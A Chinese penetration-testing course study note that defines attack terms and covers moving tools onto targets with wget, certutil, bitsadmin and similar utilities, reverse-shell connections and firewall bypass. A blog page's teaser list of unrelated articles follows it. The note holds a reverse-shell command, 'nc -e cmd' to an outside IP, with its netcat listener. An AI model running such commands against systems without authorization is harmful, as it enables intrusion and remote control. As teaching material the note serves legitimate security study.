小迪安全第一天

一、常用的专业术语

参考:
https://www.cnblogs.com/sunny11/p/13583083.html

  • POC(proof of concept)验证漏洞的代码
  • EXP(exploit) 利用对一段漏洞代码的利用
  • Playload:有效载荷,当利用exploit成功后如何通过一个管道把这个权限给到你,在真正目标系统执行的代码或指令
  • Shellcode:shell代码是playload的一类,建立正向/反向shell而得名。
  • 后门/webshell:入侵者通过某种手段攻破了目标主机,可以在对方系统中植入某段程序代码以达到访问控制/查看控制该主机。
  • 木马(攻击者):伪装称正常的程序,当该程序运行时,获取用户所有的权限达到控制该用户主机
  • 病毒:简单来说就是破坏性的程序,中了病毒就开始破坏你的电脑
  • 反弹:将权限移交到其它服务器或地址上去,用其它来实施控制
    跳板:相当于一个中介,用于连接另一个主机/服务器,一个具有辅助作用的机器,利用这个主机作为一个间接工具,来入侵其他主机,一般和肉鸡连用。
  • 黑白盒测试:黑盒测试只有一个目标没有源代码,百盒则相反。
  • 社会工程学:根据人性的弱点,一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。通俗而言是指利用人的社会学弱点实施网络攻击的一整套方法论,其攻击手法往往出乎人意料
  • 撞库:利用网络中某云等泄露的数据库,包含着用户的各种信息,在某些搭建的社工库中可以输入某人的电话邮箱等关键信息来查看某人的状态和某些密码。
  • ATT&CK:根据此MITRE ATT&CK® 可以查某些漏洞等转悠名词,以此来详细写渗透报告。

二、演示案列

基础案例1:操作系统-用途&命令&权限&用户&防火墙

  • 个人计算机&服务器用机

  • Windows&linux常见命令 网站参考:【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇
    渗透测试中常用的命令-CSDN博客

  • 文件权限&服务权限&用户权限等:为完成某种情况,需要对权限提升从而得到某个文件的内容。

  • 系统用户&用户组&服务用户等分类

  • 自带防火墙出站&入站规则策略协议

一般电脑默认的防火墙实行宽出进严
在web攻防中因为使用的时ip等协议,使得防火墙对这些协议是默认允许的基本没有什么阻碍,防火墙的策略是允许这些行为的
在进行内网渗透测试时,不仅有web上的协议还有其它等协议,正是防火墙要阻止的协议,意义说防火墙起到了真正的左右。

实用案例1:文件上传下载-解决无图形化&解决数据传输

  • 解决无图形其实都是命令行,如后期要上传攻击的工具到对方服务器上运行以命令的形式上传。
    网站工具及命令输入形式等:ywhack.com
  • Linux:wget curl python ruby perl java等

自己搭建一个网站里面有各种工具资料通过wget命令等下载到对方主机上去。

  • Windows:powershell certutil bitsadmin msiexec mshta rundll32等

在widows下载过程中可能下载失败,原因可能在当前用户下没有权限,可以换到c:\temp下

实用案列2:反弹shell命令-解决数据回显&解决数据通讯

  • 有些渗透测试中大部分是没有回显的,有些工具通过命令发送过去是否成功自己并不知道,
  • Useradd用户名 passwd 用户密码 测试linux系统添加用户或修改密码命令交互回显问题

结合案列1:防火墙绕过-正向连接&反向连接&内网服务器

  • 反弹shell在windows下的命令 :nc -e cmd 192.12.4.5
    445意思是把cmd命令的权限移交给192.12.4.5 445的服务器上,在此服务器上可以使用nc -lvvp 445 来监听455端口

内网: 内网——> xiaodi8 Xiaodi8 !->内网 解决方案:因为路由器中有端口转发/端口映射的功能,在路由器中做一个策略,把武器通过指定端口交给主机,简单解释为外网找到内网的网关(路由器)的端口从而将数据交到指定主机上去。

防火墙: Xiaodi8<->aliyun Xiaodi防火墙->aliyun aliyun!->xiaodi8防火墙 解决方案:正向连接/反向连接

#结合案列:fofa拿下pikachu服务器 文件下载&反弹shell

总结

今日学习之思维导图
在这里插入图片描述

学习总结来源于:小迪安全

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/291459.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

制药企业符合CSV验证需要注意什么?

在制药行业中&#xff0c;计算机化系统验证&#xff08;CSV&#xff09;是确保生产过程的合规性和数据完整性的关键要素。通过CSV验证&#xff0c;制药企业可以保证其计算机化系统的可靠性和合规性&#xff0c;从而确保产品质量和患者安全。然而&#xff0c;符合CSV验证并不是一…

【通讯录案例-延时调用-第三方框架-HUD框架 Objective-C语言】

一、我们接着来看这个通讯录啊,上节课我们说到这里, 1.给它加个注释,// 当用户名和密码正确的时候 进行跳转 我们现在已经把这个判断用户名和密码,登录的这个,以及Segue的简单使用,我们已经说完了, 好,然后呢,在这个里边儿啊, 我们呢,示例程序里边儿,是这个样子的…

C#自动删除20天前文件夹图片

资料夹如下&#xff0c;需求为自动删除20天前保存的图片 如下为该方法函数&#xff0c;保留天数可以自定义 public static void CleanFile(){string path $"{SvMaster.DataPath}\\Image";\\文件夹路径DirectoryInfo dir new DirectoryInfo(path);FileSystemInfo[] …

CEC2017(Python):七种算法(RFO、DBO、HHO、SSA、DE、GWO、OOA)求解CEC2017

一、7种算法简介 1、红狐优化算法RFO 2、蜣螂优化算法DBO 3、哈里斯鹰优化算法HHO 4、麻雀搜索算法SSA 5、差分进化算法DE 6、灰狼优化算法GWO 7、鱼鹰优化算法OOA 二、CEC2017简介 参考文献&#xff1a; [1]Awad, N. H., Ali, M. Z., Liang, J. J., Qu, B. Y., &…

亚马逊促销效果不好怎么办?亚马逊促销规则是什么?-站斧浏览器

亚马逊促销效果不好怎么办&#xff1f; 分析原因&#xff1a;首先需要深入分析促销效果不佳的原因。可能是促销活动的设计不够吸引人&#xff0c;或者是目标受众定位不准确。 调整策略&#xff1a;根据分析结果调整促销策略。例如&#xff0c;优化广告文案、更改推广时段或调…

CentOS7部署Kafka

CentOS7部署Kafka 一、部署1、前置条件2、下载与解压3、修改配置4、启动kafka二、使用详解1、创建一个主题2、展示所有主题3、启动消费端接收消息4、生产端发送消息三、代码集成pom.xmlapplication.propertiesKafkaConfiguration.javaKafkaConsumer.javaKafkaProducer.javaVehi…

什么是软件安全性测试?如何进行安全测试?

一、什么是软件安全性测试&#xff1f; 软件安全性测试是指对软件系统中的安全漏洞进行检测和评估的过程。其目的是为了确保软件系统在面对各种安全威胁时能够保持其功能的完整性、可用性和机密性。 二、软件安全性测试可以通过以下几个步骤来进行&#xff1a; 1. 需求分析&a…

python的初识(print+intput函数和变量的基本运用)

#主页传送&#xff1a;江南的江 #每日鸡汤&#xff1a;你要知是非以不辩为解脱&#xff0c;烦恼以忍辱为智慧&#xff0c;办事以尽力为有功&#xff0c;处人以真诚为品格。做人的方略是&#xff1a;把好自己的口&#xff0c;明了心中的事&#xff0c;干好手里的活&#xff0c;走…

Uncaught TypeError: Cannot read property ‘snj‘ of null

项目场景&#xff1a; 项目相关背景&#xff1a; 调试项目时&#xff0c;控制台出现红色报错信息 问题描述 问题&#xff1a; 调试项目时&#xff0c;控制台出现如下所示的报错信息&#xff1a; Uncaught TypeError: Cannot read property snj of nullat T.Inj.Ya [as Inj…

软件测试基础理论学习-软件测试方法论

软件测试方法论 软件测试的方法应该建立在不同的软件测试类型上&#xff0c;不同的测试类型会存在不同的方法。本文以软件测试中常见的黑盒测试为例&#xff0c;简述常见软件测试方法。 黑盒测试用例设计方法包括等价类划分法、边界值分析法、因果图法、判定表驱动法、正交试…

C++|【25】构造函数和【26】析构函数

为什么需要构造函数 创造一个实体类&#xff0c;而未将其内部变量提前赋予新值&#xff0c;并强行进行调用&#xff0c;将会随机分配上一个新的值。 而使用构造函数可以确保&#xff0c;可以使得变量有一个稳定的初始值。 Init函数需要人为去调用&#xff0c;而采用构造函数&am…

异步优势演员-评论家算法 A3C

异步优势演员-评论家算法 A3C 异步优势演员-评论家算法 A3C网络结构并行步骤 异步优势演员-评论家算法 A3C A3C 在 A2C 基础上&#xff0c;增加了并行训练&#xff08;异步&#xff09;来提高效率。 网络结构 A2C&#xff1a; A3C&#xff1a; 在这两张图之间&#xff0c;…

基于B/S架构的数字孪生智慧监所可视化监管系统

1 前言 物联网技术的发展使云计算技术得到了迅猛的发展及广泛的应用&#xff0c;智能体系的创建已经成为监狱发展的必然趋势。 智慧监狱的创建、智能化管理的推行是监狱管理的创新&#xff0c;也是监狱整体工作水平提升的具体体现。 1.1 建设背景 近年来&#xff0c;司法部不…

FlinkSQL中F【FULL OUTER JOIN】使用实例分析(坑)

Flink版本&#xff1a;flink1.14 最近有【FULL OUTER JOIN】场景的实时数据开发需求&#xff0c;想要的结果是&#xff0c;左右表来了数据都下发数据&#xff1b;左表存在的数据&#xff0c;右表进来可以关联下发&#xff08;同样&#xff0c;右表存在的数据&#xff0c;左表进…

服务器为什么大多用 Linux?

服务器为什么大多用 Linux&#xff1f; 在开始前我有一些资料&#xff0c;是我根据自己从业十年经验&#xff0c;熬夜搞了几个通宵&#xff0c;精心整理了一份「Linux的资料从专业入门到高级教程工具包」&#xff0c;点个关注&#xff0c;全部无偿共享给大家&#xff01;&#…

odoo17 | 计算字段和更改事件

前言 模型之间的关系是任何Odoo模块的关键组成部分。它们是任何业务案例建模所必需的。然而&#xff0c;我们可能希望给定模型中的字段之间存在链接。有时一个字段的值是由其他字段的值决定的&#xff0c;而有时我们希望帮助用户进行数据输入。 这些案例得到了计算字段和onch…

pycharm远程开发调试(remote development)踩坑记录2

在一次我清理了服务器上一些老的pycharm版本之后 打算重新装3.2版本&#xff0c;就全部给清理了。结果坏了事了&#xff0c;新版的装不上了。 试了公司和中科院的服务器都出现这样的问题&#xff0c;100%复现。md。 一直在这一步循环&#xff1a; Downloading the IDE Backen…

航天航空线束工艺3D虚拟展馆支持多人异地参观漫游

为了满足汽车线束企业员工工作需要&#xff0c;让新老员工了解到更先进、规范的线束工艺设计技术&#xff0c;华锐视点基于VR虚拟仿真、web3d开发和图形图像技术制作了一款汽车线束工艺设计VR虚拟仿真模拟展示系统。 汽车线束工艺设计VR虚拟仿真模拟展示系统共分为pc电脑端和VR…

在Google Colab中调用Gemini的API实现智能问答

一、引言 Google终于放出大招&#xff0c;在2023年12月6日正式推出规模最大、功能最强大的人工智能模型Gemini&#xff0c;对标ChatGPT&#xff0c;甚至有要赶超ChatGPT-4.0的节奏。 相比之前的Bard&#xff0c;Gemini的文本理解能力、图片识别能力和语义抽取能力大大增强&am…

图像分割实战-系列教程1:语义分割与实例分割概述

&#x1f341;&#x1f341;&#x1f341;图像分割实战-系列教程 总目录 有任何问题欢迎在下面留言 本篇文章的代码运行界面均在Pycharm中进行 本篇文章配套的代码资源已经上传 下篇内容&#xff1a; Unet系列算法 1、图像分割任务概述 1.1 图像分割 分割任务就是在原始图像…